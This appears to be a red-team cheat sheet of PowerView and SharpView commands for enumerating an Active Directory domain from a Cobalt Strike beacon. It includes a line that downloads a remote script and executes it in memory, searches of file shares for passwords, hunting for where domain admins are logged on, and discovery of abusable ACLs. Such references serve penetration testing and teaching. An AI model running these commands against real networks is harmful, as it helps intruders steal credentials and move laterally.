PowerView
Enumeration
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
# PowerView
IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/view.ps1');
# Domain Info
Get-Domain
Get-DomainController
# Password Policy
(Get-DomainPolicy)."SystemAccess"
Get-DomainPolicyData | select -ExpandProperty SystemAccess
# Enumerate Domain Users
Get-DomainUser | select samaccountname
# Enumerate Domain Users Properties
Get-DomainUser -Properties description,pwnlastset
# Get Detailed Information About Specific Domain User
Get-DomainUser -Identity user1
# Enumerate Domain Groups
Get-DomainGroup | select samaccountname
# Get Domain Groups That Contains The Word "admin".
Get-DomainGroup *admin* | select samaccountname
# Enumerate Domain Computers
Get-DomainComputer | select cn
Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
# Emumerate Domain Computers That Respond To Ping Request
Get-DomainComputer -Ping | select cn
# Enumerate Domain OUs
Get-DomainOU | select name
# Enumerate Domain Group Members
Get-DomainGroupMember -Identity "Domain Admins"
# Enumerate Nested Group Members (Recursive)
Get-DomainGroupMember -Identity "Domain Admins" -RecurseUsingMatchingRule | select groupname,membername,memberobjectclass
# Enumerate User Groups
Get-DomainGroup -UserName 'hsaad' | select samaccountname,memberofOpen Shares
# Enumerate Open Shares
Get-NetShare -ComputerName WorkStation1
# Enumerate Open Shares on All Domain Computers (Get-DomainComputer + Get-NetShare)
Find-DomainShare
# Enumerate Open Shares That You Have Read Access
Find-DomainShare -CheckShareAccess
# Search on Interesting Files Inside Shares
Find-InterestingFile -Path \\workstation1\c$\
# Search on Interesting Keywords Inside Files on Shares
findstr /spin /c:"password" \\workstation1\c$\users\administrator\*.txt
# Find Interesting Domain Share Files (Get-DomainComputer + Get-NetShare + Find-InterestingFile)
Find-InterestingDomainShareFile -VerboseLocal Groups
# Enumerate Local Groups on Computer WorkStation1
Get-NetLocalGroup –ComputerName WorkStation1
# Enumerate Local Group Members Of Administrators Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Administrators"
# Enumerate Local Group Members Of Remote Desktop Users Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Remote Desktop Users"
# Enumerate Local Group Members on All Domain Computers (Get-DomainComputer + Get-NetLocalGroupMember)
Find-DomainLocalGroupMember -GroupName "Administrators"Local Admin Access
# Test Admin Access Rights on a Computer
Test-AdminAccess -ComputerName workstation1
# Test Admin Access Rights on All Domain Computers (Get-DomainComputer + Test-AdminAccess)
Find-LocalAdminAccess -VerboseUser Hunting
# Enumerate Users Sessions (Reference: https://www.youtube.com/watch?v=q86VgM2Tafc)
Get-NetSession -ComputerName WorkStation1
# Enumerate LoggedOn Users
Get-NetLoggedon -ComputerName workstation1
# Get Domain Admins + Run Get-NetSession/Get-NetLoggedon on Every Domain Computer + Comparing The Result
Find-DomainUserLocation
# Perform Against Highly Traffic Servers (Get-DomainFileServer, Get-DomainDFSShare, Get-DomainControlle)
Find-DomainUserLocation -Stealth
# Run Get-NetSession/Get-NetLoggedon on Every Domain Computer Then Printing All The Result
Find-DomainUserLocation -ShowAll
# Perform Against Different Users or Groups
Find-DomainUserLocation -UserGroupIdentity "local_admin"
Find-DomainUserLocation -UserIdentity "ITSupport"Domain Group Policy
# Enumerate All Domain Group Policies
Get-DomainGPO | select DisplayName
Get-DomainGPO -Name "{AD7EE1ED-CDC8-4994-AE0F-50BA8B264829}" -Properties DisplayName
# Enumerate All Domain Group Policies Applied To This Computer
Get-DomainGPO -ComputerName WorkStation1
# Enumerate Local Admin Access Through Domain Group Policies
# Get-DomainGPO + Search For \SecEdit\GptTmpl.inf AND \Preferences\Groups\Groups.xml
Get-DomainGPOLocalGroup -Verbose
Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerNameACL
# Enumerate All The Domain ACLs For Non BuiltIn Users With Modification Access
Find-InterestingDomainAcl -ResolveGUIDs | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN SharpView
https://github.com/tevora-threat/SharpView
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Debug\SharpView.exe Get-DomainLast updated